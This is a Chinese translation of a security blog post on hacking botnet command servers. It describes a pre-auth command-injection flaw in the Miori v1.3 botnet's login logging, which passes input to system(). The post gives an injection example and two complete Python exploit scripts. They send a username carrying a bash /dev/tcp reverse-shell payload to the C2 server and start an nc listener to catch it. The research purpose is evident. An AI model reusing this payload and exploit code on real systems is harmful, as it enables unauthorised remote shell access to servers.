脚本小子的噩梦：看我如何黑掉僵尸网络

 

0x00 前言

本文将分享如何攻破一些代码存在漏洞的僵尸网络，这些僵尸网络的操作者通常为脚本小子。

此前我并未接触过这些黑产，因此对鼎鼎大名的DoS社区（译者注：僵尸网络通常被用于发动大规模DoS攻击以谋利）知之甚少。最近因为写这篇文章而收集了一些信息。根据我的理解，主要有两个僵尸网络分别为：Qbot和Mirai，并且它们不断地被改进而出现了大量变种。根据调查，我发现某些人似乎想要对僵尸网络进行”升级“，添加更多功能例如登入失败后重试，新型的DoS方法和暴力破解。这些将成为僵尸网络的”卖点“（这意味着普通人只要有钱，就可以利用肉鸡做某些事情），有时候黑产从业者也会直接出售这些肉鸡。

 

0x01 概述

目前，大部分僵尸网络工具都使用C语言编写的，C语言强大而危险，如果它们是由没有安全意识的程序员编写，则可能会铸成大错 – 我们接下来将会介绍。 只要学过二进制开发的人，都知道这个语言中的一个小错误也可能会导致巨大的漏洞，例如不规范地调用printf()和错误计算缓冲区的内存分配。 在本文，我只会分享我在Qbot僵尸网络中发现的三个漏洞中的一个，并且但这个漏洞严重性最高。 如果你觉得我很小气，那你可能就属于下图中的人？

I’m sorry，开个玩笑。我不想跟小孩子争吵，毕竟小孩子总是可以在海量服务器中弹出shell。

我在Miori v1.3僵尸网络上发现了一个预认证（Pre-auth）远程代码执行漏洞，此漏洞正是由于不当的输入处理和错误的使用system()函数而导致。 我再次重申，这是一个预认证型的远程命令执行漏洞。 修改Qbot源码时，某些人成功犯下大错 – 也许下次他们应该只使用Python¯（ツ）/¯。

不管怎么说，如果我们利用此漏洞成功劫持服务器，那简直太丢人了 :)。

 

0x02 环境搭建

	攻击者	僵尸网络服务器
系统	Linux Mint 64 bit	CentOS 7 Minimal 64bit
IP地址	10.10.10.7	10.10.10.6
端口	X	666
应用	X	Miori v1.3

下载地址：

-> Linux Mint ISO
-> CentOS 7 ISO
-> Miori v1.3

Miori v1.3僵尸网络安装教程：

-> Switch Miori Botnet setup

注：安装脚本要使用yum来下载，因此这个僵尸网络服务器必须基于RedHat系统。

注：CentOS系统默认启用了防火墙。 如果无法连接如666之类的端口，可以通过“systemctl stop firewalld”将防火墙关闭，“systemctl disable firewalld”将其完全禁用。

 

0x03 代码

解压.zip压缩包：

对于我们来说有用的文件是cnc/cnc.c。 该文件中包含了僵尸网络“操作者”所需的主要功能，有登录，注册以及攻击等功能。具体参考下面这些图片。

登入和注册界面：

通过验证(Post-auth)后的界面：

从整体来看，该工具的UI界面实际上相当不错，肯定有人在上面花了很多时间。 但是他们没有在主代码上花费精力。 可以这样说，这是非常残酷的。 多个超大的char缓冲区，42个returns和3个exits…，可怕的缩进，标签和空格混合使用，76个goto语句（已经9012年了……真有这种事？）。在将来，代码中的漏洞也不会完全消失。 我猜测，如果开发者的主要目标制作一个看起来很酷的UI来赚钱，而不是制作代码美观和可靠的东西时，则会发生这种情况。 来看看代码是什么样的，请点击下图放大查看。

 

0x04 发现漏洞

其实在整个挖掘过程，我仔细查看了cnc.c中的代码，这令我我感到非常折磨。 在793和794行中，很容易就可以看出漏洞。

792 |   char flog[1024];
793 |   sprintf(flog,"echo "<--->nfailed login with cred --> %s:%s n[victems ip] nip --> %s n<--->" >> failed.txt",iffailedu,iffailedp,ipl);
794 |   system(flog);

你看，这家伙使用iffailedu和iffailedp代表登入失败的用户名和密码。 这表示登入失败后仍可以不断尝试。 这个想法还可以，但实施起来漏洞百出。 开发者使用了system()函数代替C的文件I/O函数。 为什么？答案很简单：

引用Subby的一句话：

其实很容易可以知道为什么会这样？很大一部分僵尸网络操作者都是从社区教程中学习，或者看看YouTube上的僵尸网络视频。

通常情况下上述中问题可能会导致缓冲区溢出，因为flog分配了1024个字节，但iffailedu和iffailedp最多可达2048个字节。 并且都是基于第637行的buf变量和下面的strcpy()方法。 然而，更有趣的漏洞在后头。

 

0x05 Exploitation

转义system()函数中调用的echo命令，可以进行命令盲注。 这里我只使用username来简化攻击场景。

char data[1024];
sprintf(data,"echo "Failed login with username %sn" >> failed.txt",username);
system(data);

如果用户使用不存在的用户名登入（例如jack），系统会自动执行echo“Failed login with username jack”>> failed.txt。

入侵者可以通过往用户名（或密码）中插入恶意字符，从而达到命令执行的目的。 例如输入：v3ded"; touch /tmp/hacked; #. 系统则会运行命令echo "Failed login with username v3ded"; touch /tmp/hacked; #" >> failed.txt。 在linux bash中，#作为注释使用可以注释掉其余的命令。 因此入侵者的命令不会被记录到failed.txt。SSH连接服务器，可以看到tmp目录下确实被写入了新文件。

操作者视角：

这个错误的日志记录应当警醒脚本小子们，但考虑到缺乏技术知识，我有点怀疑他们是否理解此漏洞。让我们继续，下面我讲分享使用clear命令来隐藏错误日志。

 

0x06 Python shell

让我们首先提供所需库，确定套接字（socket），然后将其与我们服务器端口连接。

import socket
import os
import sys
from time import sleep

if(len(sys.argv) != 5):
    exit("Usage:ntpython3 {} C2_IP C2_PORT LHOST LPORT".format(sys.argv[0]))

C2_IP   = sys.argv[1]
C2_PORT = sys.argv[2]
LHOST   = sys.argv[3]
LPORT   = sys.argv[4]

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((C2_IP, int(C2_PORT)))
Afterwards we need to simulate the login process. We can do that by simply sending 3 messages to the server - login, username payload and password respectively.

CMD = "sh -i >& /dev/tcp/{}/{} 0>&1".format(LHOST, LPORT) # Payload

print("Simulating a login command.")
sock.send(bytes("loginrn", "utf-8"))    

sleep(1)
print("Sending the payload.")
sock.send(bytes('user";clear; {} ;# rn'.format(CMD),"utf-8")) # Hiding the error output with ;clear

sock.send(bytes('Press F to pay respects.rn',"utf-8")) # Password doesn't matter
sleep(1)

可以看到，bash与/dev/tcp/结合可以构造反向shell。 可以看到每个命令都会发送包含回车符(r)和换行符(n)。 重要的一点，如果没有结合CRLF（回车换行），则无法利用漏洞。

注意：CentOS没有自带netcat。 如果要使用shell或下载数据，需要安装它。

#!/usr/env/python3

import socket
import os
import sys
import threading
from time import sleep

def Listen(port):
    os.system("nc -nlvp {}".format(port))

if(len(sys.argv) != 5):
    exit("Usage:ntpython3 {} C2_IP C2_PORT LHOST LPORT".format(sys.argv[0]))

C2_IP   = sys.argv[1]
C2_PORT = sys.argv[2]
LHOST   = sys.argv[3]
LPORT   = sys.argv[4]

CMD  = "sh -i >& /dev/tcp/{}/{} 0>&1".format(LHOST, LPORT)

try:    
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((C2_IP, int(C2_PORT)))        

    print("Simulating a login command.")
    sock.send(bytes("loginrn", "utf-8"))    

    sleep(1)
    print("Sending the payload.")
    sock.send(bytes('user";clear; {} ;# rn'.format(CMD),"utf-8"))

    sock.send(bytes('Press F to pay respects.rn',"utf-8"))
    sleep(1)

    t = threading.Thread(target=Listen, args=(int(sys.argv[4]),))
    t.start()

except Exception as err:
    exit(str(err))

Ok，现在我们可以尝试攻击僵尸网络，如果成功则会有以下画面：

很酷是吧？ 如果操作者在恰当端口上正确配置，那僵尸网络的运行身份不会是root。 但是，由于各种服务提供商都默认使用root用户，并且我们的脚本小子们只会复制粘贴不知道他们在做什么的情况下，我打赌你那到的shell大多数都是root权限。

 

0x07 后记

当我写这篇博客时，又一个名为switchware的Qbot变种发布了。我没有深入研究代码，但发现了后认证(post-auth)RCE漏洞。 这个漏洞利用起来有些麻烦，因为缓冲区限制50个字节，但已利用45个字节。 如果本文热度还可以，我会再写一篇文章分享它: )。你可以尝试把它当作一次训练，攻破它。 存在漏洞代码在第557,558和566行。

Poc：

 

0x08 参考

Miori src: here
Miori exploit: here

Switchware src: here
Switchware exploit: N/A